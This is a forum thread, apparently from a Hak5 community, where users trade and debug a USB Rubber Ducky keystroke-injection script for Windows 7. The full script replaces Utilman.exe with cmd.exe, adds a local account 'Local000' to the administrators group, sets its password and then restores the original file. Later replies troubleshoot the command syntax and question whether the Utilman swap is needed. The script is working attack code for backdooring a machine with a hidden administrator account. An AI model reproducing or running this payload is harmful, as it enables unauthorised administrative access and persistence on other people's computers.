Jump to content

[Payload] Utilman Exploit Payload


mackwage

Recommended Posts

I seem to have issues with the payload as is. The issue seems to be with the below lines:

MENU

STRING a

ENTER

I assume this is to right click on the CMD exe and run as administrator. However it seems to right click within the text box of the start menu. Does anyone else have this issue?

Link to comment
Share on other sites

Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows7... specifically the icacls, ren, rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command.

DELAY 200

GUI r

DELAY 50

STRING cmd

DELAY 50

ENTER

DELAY 50

STRING takeown /f "%systemroot%\System32\Utilman.exe"

ENTER

DELAY 50

STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

ENTER

DELAY 50

STRING cd %systemroot%\System32

ENTER

DELAY 50

STRING mkdir util

ENTER

STRING xcopy cmd.exe util\

ENTER

DELAY 50

STRING ren Utilman.exe Utilman.exe.bak

ENTER

DELAY 50

STRING cd /util

ENTER

DELAY 50

STRING ren cmd.exe Utilman.exe

ENTER

DELAY 50

STRING cd ..

ENTER

DELAY 50

STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

ENTER

DELAY 50

STRING rmdir /s /q util

ENTER

DELAY 50

STRING exit

ENTER

DELAY 50

GUI u

STRING net user Local000 /add

ENTER

DELAY 50

STRING net localgroup administrators Local000 /add

ENTER

DELAY 50

STRING exit

ENTER

DELAY 50

GUI r

STRING cmd

ENTER

DELAY 50

STRING cd "%systemroot%\System32"

ENTER

DELAY 50

STRING delete Utilman.exe

ENTER

DELAY 50

STRING y

ENTER

DELAY 50

STRING ren Utilman.exe.bak Utilman.exe

ENTER

DELAY 50

STRING exit

ENTER

GUI r

DELAY 500

STRING cmd

DELAY 500

ENTER

DELAY 200

STRING net user Local000 *

ENTER

STRING hak5

ENTER

STRING hak5

ENTER

STRING exit

ENTER

Link to comment
Share on other sites

What version of Windows 7 did you run this on? I ran all the commands on Windows 7 Home Premium 64-Bit and they worked perfectly.

Also, you may find it easier to add the "DEFAULT_DELAY" command to the start of the script.

I will append those changes to the Wiki, as well.

Link to comment
Share on other sites

Thanks for the tip on the default delay.

I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior.

icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

This command didn't actually seem to change the permissions unless adding the "/grant administrators:F /T". I did some Google searching on the command to understand more how it works which lead to me adding the last part.

STRING xcopy cmd.exe util\

I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory.

STRING cd /util

STRING ren cmd.exe Utilman.exe

STRING cd ..

I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory.

STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead.

STRING rmdir /s /q util

Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it.

I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P

Link to comment
Share on other sites

  • 2 years later...

What is the purpose of all the utilman.exe machinations? Once you have the administrator mode cmd prompt, running the net user (create), net localgroup and net user (password) work directly. No footprints to clean up, and the same effect. The only use for utilman.exe I've found involves getting a cmd prompt with no logon at all, and your script presupposes a logged on user - with admin privs - that can do the three target commands in the first window.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...